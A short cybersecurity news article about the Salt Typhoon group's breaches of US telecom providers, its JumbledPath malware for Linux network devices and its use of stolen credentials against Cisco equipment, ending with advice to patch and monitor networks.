HQ/EMEAFind out how we can help your business
Chinese hackers from the state-sponsored group Salt Typhoon have been exposed for launching targeted cyberattacks against major US telecommunications networks.
Using a custom-built malware tool named JumbledPath, the group managed to infiltrate telecom providers and monitor network traffic, leading to the theft of sensitive data, including private communications of US government officials.
Salt Typhoon, also known as Earth Estries, GhostEmperor, and UNC2286, has been active since 2019, focusing on government entities and telecom companies. Recent investigations revealed that the group successfully breached several major US telecom providers, including Verizon, AT&T, Lumen Technologies, and T-Mobile. Alarming findings showed that Salt Typhoon accessed confidential government communications and even stole information related to court-authorised wiretapping requests.
Security researchers found that the hackers targeted over 1,000 Cisco network devices between December 2024 and January 2025, with more than half located in the US, South America, and India. Cisco Talos reported that Salt Typhoon used stolen credentials as their primary method of infiltration, with only one case involving the exploitation of the Cisco CVE-2018-0171 vulnerability. No new vulnerabilities were identified during this campaign.
Once inside the networks, the Chinese hackers expanded their reach by extracting additional credentials and intercepting authentication traffic.
They exfiltrated device configurations containing sensitive data through unsecured transfer methods, enabling further lateral movement within the network. The group demonstrated advanced evasion tactics, such as frequently switching between devices to avoid detection and modifying network settings to maintain persistent access.
A key tool in their operation was the JumbledPath malware, a Go-based binary designed for Linux-based networking devices. This tool allowed the hackers to capture network traffic while masking their presence, disabling logs, and clearing evidence to complicate forensic investigations.
Cybersecurity experts warn that Chinese hackers are increasingly targeting edge networking devices from major vendors like Fortinet, Cisco, and SonicWall. Organisations are urged to patch systems promptly and monitor for unusual network activity to defend against such sophisticated threats.
